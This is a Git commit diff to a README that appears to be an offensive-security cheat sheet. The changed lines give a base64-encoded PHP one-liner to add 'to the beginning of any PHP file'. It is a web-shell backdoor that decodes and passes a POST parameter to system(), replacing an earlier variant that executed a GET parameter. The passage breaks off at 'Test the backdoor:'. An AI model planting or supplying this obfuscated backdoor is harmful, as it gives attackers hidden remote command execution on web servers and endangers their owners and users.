Update README.md

This commit is contained in:
skyper
2024-01-31 01:16:52 +00:00
committed by GitHub
parent 4f194c8f1f
commit 683ce1a0ea
+1 -2
View File
@@ -1533,9 +1533,8 @@ Other methods:
Add this line to the beginning of any PHP file:
```php
<?php $i=base64_decode("aWYoaXNzZXQoJF9HRVRbMF0pKXtlY2hvIGAkX0dFVFswXWA7ZXhpdDt9");eval($i);?>
<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>
```
(Thanks @dono for making this 3 bytes smaller than the smallest)
Test the backdoor:
```sh